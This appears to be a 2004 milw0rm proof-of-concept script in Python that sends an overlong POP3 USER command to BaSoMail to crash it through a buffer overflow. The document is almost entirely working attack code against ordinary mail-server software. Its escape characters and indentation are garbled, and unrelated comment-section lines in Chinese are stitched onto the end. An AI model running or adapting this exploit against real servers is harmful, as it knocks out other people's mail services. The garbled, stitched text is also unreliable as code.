#########################################################
# BaSoMail Multiple Buffer Overflow DOS #
# 24 Oct 2004 - muts #
# Probably exploitable - However, I lack sleep! #
#########################################################
import struct
import socket
print "nn######################################################"
print "nBaSoMail Multiple Buffer Overflow DOS"
print "nFound & coded by muts [at] whitehat.co.il"
print "nAlmost all the SMTP and POP3 commands are prone to BO.n"
print "nFor Educational Purposes Only!n"
print "nn######################################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Example buffer overflow
buffer = 'x41'*10000
try:
print "nSending evil buffer..."
s.connect(('192.168.1.32',110))
s.send('USER ' + buffer + 'rn')
data = s.recv(1024)
s.close()
print "nRun this script again, and server should crash."
except:
print "nCould not connect to sever!"
# milw0rm.com [2004-10-26]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666